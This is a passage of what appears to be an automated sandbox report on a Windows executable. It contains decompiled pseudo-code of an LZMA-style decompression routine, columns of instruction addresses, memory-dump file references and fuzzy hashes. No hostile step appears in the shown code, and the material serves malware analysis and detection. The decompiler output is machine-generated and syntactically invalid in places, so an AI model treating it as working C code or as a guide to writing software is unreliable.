												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














              0x00000000
              0x00406efa
              0x00406efa
              0x00406efe
              0x00406f1f
              0x00406f26
              0x00406f2c
              0x00406f32
              0x00406f44
              0x00406f4a
              0x00406f4f
              0x00000000
              0x00406f00
              0x00406f06
              0x004072c7
              0x004072c7
              0x004072c7
              0x004072ca
              0x004072ca
              0x004072ca
              0x004072d0
              0x004072d6
              0x004072dc
              0x004072f6
              0x004072f9
              0x004072ff
              0x0040730a
              0x0040730c
              0x004072de
              0x004072de
              0x004072ed
              0x004072f1
              0x004072f1
              0x00407316
              0x00000000
              0x00000000
              0x00407318
              0x0040731c
              0x004074cb
              0x004074e1
              0x004074e9
              0x004074f0
              0x004074f2
              0x004074f9
              0x004074fd
              0x004074fd
              0x00407328
              0x0040732f
              0x00407337
              0x0040733a
              0x0040733d
              0x0040733d
              0x00407343
              0x00407343
              0x00406adf
              0x00406adf
              0x00406adf
              0x00406ae8
              0x00000000
              0x00000000
              0x00406aee
              0x00000000
              0x00406af9
              0x00000000
              0x00000000
              0x00406b02
              0x00406b05
              0x00406b08
              0x00406b0c
              0x00000000
              0x00000000
              0x00406b12
              0x00406b15
              0x00406b17
              0x00406b18
              0x00406b1b
              0x00406b1d
              0x00406b1e
              0x00406b20
              0x00406b23
              0x00406b28
              0x00406b2d
              0x00406b36
              0x00406b49
              0x00406b4c
              0x00406b58
              0x00406b80
              0x00406b82
              0x00406b90
              0x00406b90
              0x00406b94
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406b84
              0x00406b84
              0x00406b87
              0x00406b88
              0x00406b88
              0x00000000
              0x00406b84
              0x00406b5e
              0x00406b63
              0x00406b63
              0x00406b6c
              0x00406b74
              0x00406b77
              0x00000000
              0x00406b7d
              0x00406b7d
              0x00000000
              0x00406b7d
              0x00000000
              0x00406b9a
              0x00406b9a
              0x00406b9e
              0x0040744a
              0x00000000
              0x0040744a
              0x00406ba7
              0x00406bb7
              0x00406bba
              0x00406bbd
              0x00406bbd
              0x00406bbd
              0x00406bc0
              0x00406bc4
              0x00000000
              0x00000000
              0x00406bc6
              0x00406bcc
              0x00406bf6
              0x00406bfc
              0x00406c03
              0x00000000
              0x00406c03
              0x00406bd2
              0x00406bd5
              0x00406bda
              0x00406bda
              0x00406be5
              0x00406bed
              0x00406bf0
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406c35
              0x00406c3b
              0x00406c3e
              0x00406c4b
              0x00406c53
              0x00000000
              0x00000000
              0x00406c0a
              0x00406c0a
              0x00406c0e
              0x00407459
              0x00000000
              0x00407459
              0x00406c1a
              0x00406c25
              0x00406c25
              0x00406c25
              0x00406c28
              0x00406c2b
              0x00406c2e
              0x00406c33
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x004072ca
              0x004072ca
              0x004072d0
              0x004072d6
              0x004072dc
              0x004072f6
              0x004072f9
              0x004072ff
              0x0040730a
              0x0040730c
              0x004072de
              0x004072de
              0x004072ed
              0x004072f1
              0x004072f1
              0x00407316
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406c5b
              0x00406c5d
              0x00406c60
              0x00406cd1
              0x00406cd4
              0x00406cd7
              0x00406cde
              0x00406ce8
              0x004072c7
              0x004072c7
              0x00000000
              0x004072c7
              0x00406c62
              0x00406c66
              0x00406c69
              0x00406c6b
              0x00406c6e
              0x00406c71
              0x00406c73
              0x00406c76
              0x00406c78
              0x00406c7d
              0x00406c80
              0x00406c83
              0x00406c87
              0x00406c8e
              0x00406c91
              0x00406c98
              0x00406c9c
              0x00406ca4
              0x00406ca4
              0x00406ca4
              0x00406c9e
              0x00406c9e
              0x00406c9e
              0x00406c93
              0x00406c93
              0x00406c93
              0x00406ca8
              0x00406cab
              0x00406cc9
              0x00406ccb
              0x00000000
              0x00406cad
              0x00406cad
              0x00406cb0
              0x00406cb3
              0x00406cb6
              0x00406cb8
              0x00406cb8
              0x00406cb8
              0x00406cbb
              0x00406cbe
              0x00406cc0
              0x00406cc1
              0x00406cc4
              0x00000000
              0x00406cc4
              0x00000000
              0x00000000
              0x00000000
              0x00406f64
              0x00406f68
              0x00406f8b
              0x00406f8e
              0x00406f91
              0x00406f9b
              0x00406f6a
              0x00406f6a
              0x00406f6d
              0x00406f70
              0x00406f73
              0x00406f80
              0x00406f83
              0x00406f83
              0x004072c7
              0x004072c7
              0x004072c7
              0x00000000
              0x004072c7
              0x00000000
              0x00406fa7
              0x00406fab
              0x00000000
              0x00000000
              0x00406fb1
              0x00406fb5
              0x00000000
              0x00000000
              0x00406fbb
              0x00406fbd
              0x00406fc1
              0x00406fc1
              0x00406fc4
              0x00406fc8
              0x00000000
              0x00000000
              0x00407018
              0x0040701c
              0x00407023
              0x00407026
              0x00407029
              0x00407033
              0x004072c7
              0x004072c7
              0x004072c7
              0x00000000
              0x004072c7
              0x004072c7
              0x0040701e
              0x00000000
              0x00000000
              0x0040703f
              0x00407043
              0x0040704a
              0x0040704d
              0x00407050
              0x00407045
              0x00407045
              0x00407045
              0x00407053
              0x00407056
              0x00407059
              0x00407059
              0x0040705c
              0x0040705f
              0x00407062
              0x00407062
              0x00407065
              0x0040706c
              0x00407071
              0x00000000
              0x00000000
              0x004070ff
              0x004070ff
              0x00407103
              0x004074a1
              0x00000000
              0x004074a1
              0x00407109
              0x0040710c
              0x0040710f
              0x00407113
              0x00407116
              0x0040711c
              0x0040711e
              0x0040711e
              0x0040711e
              0x00407121
              0x00407124
              0x00000000
              0x00000000
              0x00406cf4
              0x00406cf4
              0x00406cf8
              0x00407465
              0x00000000
              0x00407465
              0x00406cfe
              0x00406d01
              0x00406d04
              0x00406d08
              0x00406d0b
              0x00406d11
              0x00406d13
              0x00406d13
              0x00406d13
              0x00406d16
              0x00406d19
              0x00406d19
              0x00406d1c
              0x00406d1f
              0x00000000
              0x00000000
              0x00406d25
              0x00406d2b
              0x00000000
              0x00000000
              0x00406d31
              0x00406d31
              0x00406d35
              0x00406d38
              0x00406d3b
              0x00406d3e
              0x00406d41
              0x00406d42
              0x00406d45
              0x00406d47
              0x00406d4d
              0x00406d50
              0x00406d53
              0x00406d56
              0x00406d59
              0x00406d5c
              0x00406d5f
              0x00406d7b
              0x00406d7e
              0x00406d81
              0x00406d84
              0x00406d8b
              0x00406d8f
              0x00406d91
              0x00406d95
              0x00406d61
              0x00406d61
              0x00406d65
              0x00406d6d
              0x00406d72
              0x00406d74
              0x00406d76
              0x00406d76
              0x00406d98
              0x00406d9f
              0x00406da2
              0x00000000
              0x00406da8
              0x00000000
              0x00406da8
              0x00000000
              0x00406dad
              0x00406dad
              0x00406db1
              0x00407471
              0x00000000
              0x00407471
              0x00406db7
              0x00406dba
              0x00406dbd
              0x00406dc1
              0x00406dc4
              0x00406dca
              0x00406dcc
              0x00406dcc
              0x00406dcc
              0x00406dcf
              0x00406dd2
              0x00406dd2
              0x00406dd2
              0x00406dd8
              0x00000000
              0x00000000
              0x00406dda
              0x00406ddd
              0x00406de0
              0x00406de3
              0x00406de6
              0x00406de9
              0x00406dec
              0x00406def
              0x00406df2
              0x00406df5
              0x00406df8
              0x00406e10
              0x00406e13
              0x00406e16
              0x00406e19
              0x00406e19
              0x00406e1c
              0x00406e20
              0x00406e22
              0x00406dfa
              0x00406dfa
              0x00406e02
              0x00406e07
              0x00406e09
              0x00406e0b
              0x00406e0b
              0x00406e25
              0x00406e2c
              0x00406e2f
              0x00000000
              0x00406e31
              0x00000000
              0x00406e31
              0x00406e2f
              0x00406e36
              0x00406e36
              0x00406e36
              0x00406e36
              0x00000000
              0x00000000
              0x00406e71
              0x00406e71
              0x00406e75
              0x0040747d
              0x00000000
              0x0040747d
              0x00406e7b
              0x00406e7e
              0x00406e81
              0x00406e85
              0x00406e88
              0x00406e8e
              0x00406e90
              0x00406e90
              0x00406e90
              0x00406e93
              0x00406e96
              0x00406e96
              0x00406e9c
              0x00406e3a
              0x00406e3a
              0x00406e3d
              0x00000000
              0x00406e3d
              0x00406e9e
              0x00406e9e
              0x00406ea1
              0x00406ea4
              0x00406ea7
              0x00406eaa
              0x00406ead
              0x00406eb0
              0x00406eb3
              0x00406eb6
              0x00406eb9
              0x00406ebc
              0x00406ed4
              0x00406ed7
              0x00406eda
              0x00406edd
              0x00406edd
              0x00406ee0
              0x00406ee4
              0x00406ee6
              0x00406ebe
              0x00406ebe
              0x00406ec6
              0x00406ecb
              0x00406ecd
              0x00406ecf
              0x00406ecf
              0x00406ee9
              0x00406ef0
              0x00406ef3
              0x00000000
              0x00406ef5
              0x00000000
              0x00406ef5
              0x00000000
              0x00407182
              0x00407182
              0x00407186
              0x004074ad
              0x00000000
              0x004074ad
              0x0040718c
              0x0040718f
              0x00407192
              0x00407196
              0x00407199
              0x0040719f
              0x004071a1
              0x004071a1
              0x004071a1
              0x004071a4
              0x00000000
              0x00000000
              0x00406f52
              0x00406f52
              0x00406f55
              0x004072c7
              0x004072c7
              0x004072c7
              0x00000000
              0x004072c7
              0x00000000
              0x00407291
              0x00407295
              0x004072b7
              0x004072ba
              0x004072c4
              0x004072c7
              0x004072c7
              0x004072c7
              0x00000000
              0x004072c7
              0x004072c7
              0x00407297
              0x0040729a
              0x0040729e
              0x004072a1
              0x004072a1
              0x004072a4
              0x00000000
              0x00000000
              0x0040734e
              0x00407352
              0x00407370
              0x00407370
              0x00407370
              0x00407377
              0x0040737e
              0x00407385
              0x00407385
              0x00000000
              0x00407385
              0x00407354
              0x00407357
              0x0040735a
              0x0040735d
              0x00407364
              0x004072a8
              0x004072a8
              0x004072ab
              0x00000000
              0x00000000
              0x0040743f
              0x00407442
              0x00407343
              0x00000000
              0x00000000
              0x00407079
              0x0040707b
              0x00407082
              0x00407083
              0x00407085
              0x00407088
              0x00000000
              0x00000000
              0x00407090
              0x00407093
              0x00407096
              0x00407098
              0x0040709a
              0x0040709a
              0x0040709b
              0x0040709e
              0x004070a5
              0x004070a8
              0x004070b6
              0x00000000
              0x00000000
              0x0040738c
              0x0040738c
              0x0040738f
              0x00407396
              0x00000000
              0x00000000
              0x0040739b
              0x0040739b
              0x0040739f
              0x004074d7
              0x00000000
              0x004074d7
              0x004073a5
              0x004073a8
              0x004073ab
              0x004073af
              0x004073b2
              0x004073b8
              0x004073ba
              0x004073ba
              0x004073ba
              0x004073bd
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c3
              0x004073c3
              0x004073c7
              0x00407427
              0x0040742a
              0x0040742f
              0x00407430
              0x00407432
              0x00407434
              0x00407437
              0x00407343
              0x00407343
              0x00000000
              0x00407349
              0x00407343
              0x004073c9
              0x004073cf
              0x004073d2
              0x004073d5
              0x004073d8
              0x004073db
              0x004073de
              0x004073e1
              0x004073e4
              0x004073e7
              0x004073ea
              0x00407403
              0x00407406
              0x00407409
              0x0040740c
              0x00407410
              0x00407412
              0x00407412
              0x00407413
              0x00407416
              0x004073ec
              0x004073ec
              0x004073f4
              0x004073f9
              0x004073fb
              0x004073fe
              0x004073fe
              0x00407419
              0x00407420
              0x00000000
              0x00407422
              0x00000000
              0x00407422
              0x00000000
              0x004070be
              0x004070c1
              0x004070f7
              0x00407227
              0x00407227
              0x00407227
              0x00407227
              0x0040722a
              0x0040722a
              0x0040722d
              0x0040722f
              0x004074b9
              0x00000000
              0x004074b9
              0x00407235
              0x00407238
              0x00000000
              0x00000000
              0x0040723e
              0x00407242
              0x00407245
              0x00407245
              0x00407245
              0x00000000
              0x00407245
              0x004070c3
              0x004070c5
              0x004070c7
              0x004070c9
              0x004070cc
              0x004070cd
              0x004070cf
              0x004070d1
              0x004070d4
              0x004070d7
              0x004070ed
              0x004070f2
              0x0040712a
              0x0040712a
              0x0040712e
              0x0040715a
              0x0040715c
              0x00407163
              0x00407166
              0x00407169
              0x00407169
              0x0040716e
              0x0040716e
              0x00407170
              0x00407173
              0x0040717a
              0x0040717d
              0x004071aa
              0x004071aa
              0x004071ad
              0x004071b0
              0x00407224
              0x00407224
              0x00407224
              0x00000000
              0x00407224
              0x004071b2
              0x004071b8
              0x004071bb
              0x004071be
              0x004071c1
              0x004071c4
              0x004071c7
              0x004071ca
              0x004071cd
              0x004071d0
              0x004071d3
              0x004071ec
              0x004071ee
              0x004071f1
              0x004071f2
              0x004071f5
              0x004071f7
              0x004071fa
              0x004071fc
              0x004071fe
              0x00407201
              0x00407203
              0x00407206
              0x0040720a
              0x0040720c
              0x0040720c
              0x0040720d
              0x00407210
              0x00407213
              0x004071d5
              0x004071d5
              0x004071dd
              0x004071e2
              0x004071e4
              0x004071e7
              0x004071e7
              0x00407216
              0x0040721d
              0x004071a7
              0x004071a7
              0x004071a7
              0x004071a7
              0x00000000
              0x0040721f
              0x00000000
              0x0040721f
              0x0040721d
              0x00407130
              0x00407133
              0x00407135
              0x00407138
              0x0040713b
              0x0040713e
              0x00407140
              0x00407143
              0x00407146
              0x00407146
              0x00407149
              0x00407149
              0x0040714c
              0x00407153
              0x00407127
              0x00407127
              0x00407127
              0x00407127
              0x00000000
              0x00407155
              0x00000000
              0x00407155
              0x00407153
              0x004070d9
              0x004070dc
              0x004070de
              0x004070e1
              0x00000000
              0x00000000
              0x00406e40
              0x00406e40
              0x00406e44
              0x00407489
              0x00000000
              0x00407489
              0x00406e4a
              0x00406e4d
              0x00406e50
              0x00406e53
              0x00406e56
              0x00406e59
              0x00406e5c
              0x00406e5e
              0x00406e61
              0x00406e64
              0x00406e67
              0x00406e69
              0x00406e69
              0x00406e69
              0x00000000
              0x00000000
              0x00406fcb
              0x00406fcb
              0x00406fcf
              0x00407495
              0x00000000
              0x00407495
              0x00406fd5
              0x00406fd8
              0x00406fdb
              0x00406fde
              0x00406fe0
              0x00406fe0
              0x00406fe0
              0x00406fe3
              0x00406fe6
              0x00406fe9
              0x00406fec
              0x00406fef
              0x00406ff2
              0x00406ff3
              0x00406ff5
              0x00406ff5
              0x00406ff5
              0x00406ff8
              0x00406ffb
              0x00406ffe
              0x00407001
              0x00407001
              0x00407001
              0x00407004
              0x00407006
              0x00407006
              0x00000000
              0x00000000
              0x00407248
              0x00407248
              0x00407248
              0x0040724c
              0x00000000
              0x00000000
              0x00407252
              0x00407255
              0x00407258
              0x0040725b
              0x0040725d
              0x0040725d
              0x0040725d
              0x00407260
              0x00407263
              0x00407266
              0x00407269
              0x0040726c
              0x0040726f
              0x00407270
              0x00407272
              0x00407272
              0x00407272
              0x00407275
              0x00407278
              0x0040727b
              0x0040727e
              0x00407281
              0x00407285
              0x00407287
              0x0040728a
              0x00000000
              0x0040728c
              0x00407009
              0x00407009
              0x00000000
              0x00407009
              0x0040728a
              0x004074bf
              0x00000000
              0x00000000
              0x00406aee
              0x004074f6
              0x004074f6
              0x00000000
              0x004074f6
              0x00407343
              0x004072ca
              0x004072c7
              0x00000000
              0x00406efe

              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: db5198ca4190c6b334929519d9078d0b7c25f309867be5a342d9eedfd0dff6d3
              • Instruction ID: b4a429368d408adc735ccef7c69d02ca95e21b2dffe456e9be617d596e32585a
              • Opcode Fuzzy Hash: db5198ca4190c6b334929519d9078d0b7c25f309867be5a342d9eedfd0dff6d3
              • Instruction Fuzzy Hash: 44711371D04228CFDF28CFA8C954BADBBB1FB44305F15806AD856BB281D7386986DF45
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00407018, Relevance: 5.2, APIs: 4, Instructions: 170COMMON
              Download Yara Rule
              C-Code - Quality: 98%
              			E00407018() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

